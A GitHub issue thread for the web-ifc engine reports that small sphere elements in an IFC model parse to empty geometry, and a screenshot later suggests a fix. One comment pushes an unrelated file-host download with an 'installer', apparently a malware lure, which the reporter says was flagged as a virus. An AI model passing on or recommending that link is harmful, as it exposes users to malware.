### ISSUE TITLE
[Bug]: Empty geometries

### ISSUE THREAD

**Issue by hellghostx** [ThatOpen/engine_web-ifc#1014]
### What happened?

In this model, there is 16 IfcBuildingElementProxy elements. 8 of them are fine. 8 of them returns geometriesByteSize equal to 0.

According to author of the model they have been testing spheres and those, which do have radius 10mm are visualized and those with radius 5mm are not visualized.

This is how it should looked like:

![obrazek](https://github.com/user-attachments/assets/5e48b7e1-909e-4d59-be5d-0d219de4f148)

This is model output after parsing:

![obrazek](https://github.com/user-attachments/assets/35157f09-dc3a-43ca-8e47-59b85e33bd3d)

### Version

latest

### What browsers are you seeing the problem on?

Chrome

### Anything else?

[spheres.zip](https://github.com/user-attachments/files/16871476/spheres.zip)

**Comment by Shadi201711** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by hellghostx** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

It was marked as "contains virus"

**Comment by QuimMoya** [comment]
I think i solved it
![image](https://github.com/user-attachments/assets/69f55524-7227-417d-bae7-0eeb556b0951)

**Comment by hellghostx** [comment]
> I think i solved it ![image](https://private-user-images.githubusercontent.com/12625508/368924538-69f55524-7227-417d-bae7-0eeb556b0951.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjY3NDM0OTgsIm5iZiI6MTcyNjc0MzE5OCwicGF0aCI6Ii8xMjYyNTUwOC8zNjg5MjQ1MzgtNjlmNTU1MjQtNzIyNy00MTdkLWJhZTctMGVlYjU1NmIwOTUxLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MTklMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTE5VDEwNTMxOFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTc0MjBhYWY5ZmVjNmE0YjkzYzBlNTIxZTZlZWIwZmMwNDg0ZjU4NDBjNjNmZjBhNjg2YTU1ZThiOGVhNTA2ZGUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0._CiPwoc0SqfACmguPcTK_RGBp2HpCDrEtmDk2roZBeY)

Seems like it!
